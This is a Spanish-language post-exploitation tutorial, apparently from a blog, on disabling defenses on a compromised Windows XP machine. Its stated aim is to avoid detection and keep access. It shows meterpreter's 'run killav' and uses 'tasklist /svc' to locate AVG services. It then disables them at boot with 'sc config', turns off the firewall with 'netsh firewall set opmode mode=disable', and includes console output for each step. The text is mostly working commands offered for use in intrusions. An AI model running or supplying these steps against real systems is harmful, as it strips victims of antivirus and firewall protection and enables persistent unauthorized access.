Tras obtener acceso a un equipo con Windows por alguna vulnerabilidad lo primero que debemos hacer es garantizarnos que su antivirus no nos detecte y nos bloquee y posteriormente desactivar el cortafuegos (si es que lo hubiera) para evitar así que nos bloquee próximas intrusiones, esta vez ya "consentidas". Estas dos tareas están dentro de la post-explotación de una vulnerabilidad y deben ser de las primeras en lanzarse, para intentar conseguir estar el máximo tiempo posible dentro del equipo.
Entonces, ¿cómo hacemos para desactivar el antivirus? Por suerte meterpreter trae la solución ya implantada de mano,
meterpreter> run killav
[*] Killing Antivirus services on the target...
Este pequeño comando, ya implementado mata todas las sesiones de los antivirus más conocidos, dejando así el sistema indefenso. Luego una vez no haya ya antivirus lo que debemos de realizar es una pequeña comprobación de servicios, para así terminar por desactivar el antivirus en futuros inicios del equipo. Esto lo podemos conseguir con el comando tasklist, para luego gracias al comando sc poder desactivarlo.
meterpreter> shell
Process 1092 created.
Channel 2 created.
Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> tasklist /svc
tasklist /svc
Nombre de imagen PID Servicios
===================== ==== ============================================
System Idle Process 0 N/D
System 4 N/D
smss.exe 392 N/D
csrss.exe 720 N/D
winlogon.exe 744 N/D
services.exe 796 Eventlog, PlugPlay
lsass.exe 816 ProtectedStorage, SamSs
svchost.exe 976 DcomLaunch, TermService
svchost.exe 1040 RpcSs
svchost.exe 1128 AudioSrv, Browser, CryptSvc, Dhcp,
dmserver, ERSvc, EventSystem,
FastUserSwitchingCompatibility, helpsvc,
lanmanserver, lanmanworkstation, Netman,
Nla, Schedule, seclogon, SENS, SharedAccess,
ShellHWDetection, srservice, Themes, TrkWks,
W32Time, winmgmt, wscsvc, wuauserv, WZCSVC
logonui.exe 1136 N/D
svchost.exe 1352 Dnscache
svchost.exe 1368 LmHosts, RemoteRegistry, SSDPSRV
spoolsv.exe 1528 Spooler
cvpnd.exe 2016 CVPND
...
Esta salida agrupa los procesos por servicios, así que sólo queda encontrar el servicio de antivirus, por ejemplo, usando
C:\WINDOWS\system32> tasklist /svc | find /I "avg"
tasklist /svc | find /I "avg"
avgwdsvc.exe 3958 avgwd
avgnsx.exe 3912 N/A
avgemcx.exe 3594 N/A
avgtray.exe 3698 N/A
avgidagent.exe 3125 AVGIDSAgent
avgrsx.exe 2658 N/A
avgcsrvx.exe 4005 N/A
Y una vez sepamos que sí está presente en el sistema, únicamente lo deshabilitamos,
C:\WINDOWS\system32> sc config avgwd start=disable
sc config avgwd start=disable
[SC] ChangeServiceConfig SUCCESS
C:\WINDOWS\system32> sc config AVGIDSAgent start=disable
sc config AVGIDSAgent start=disable
[SC] ChangeServiceConfig SUCCESS
Tras esto, en los próximos reinicios del sistema, el antivirus no debería de arrancar.
Ahora tenemos que aprovechar que tenemos acceso para parar el cortafuegos. Para hacerlo,
meterpreter> shell
Process 1880 created.
Channel 1 created.
Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> netsh firewall set opmode mode=disable
netsh firewall set opmode mode=disable
Aceptar
Tras ejecutarlo satisfactoriamente,
C:\WINDOWS\system32> netsh firewall show opmode
netsh firewall show opmode
Configuración del perfil Dominio:
-------------------------------------------------------------------
Modo funcional = Habilitar
Modo de excepción = Habilitar
Configuración del perfil Estándar (actual):
-------------------------------------------------------------------
Modo funcional = Deshabilitar
Modo de excepci¢n = Habilitar
Configuración del servidor de seguridad conexión de rea local:
-------------------------------------------------------------------
Modo funcional = Habilitar
Lo que, por ejemplo en mi Windows XP ha provocado un popup de advertencia (ya que así lo tengo configurado).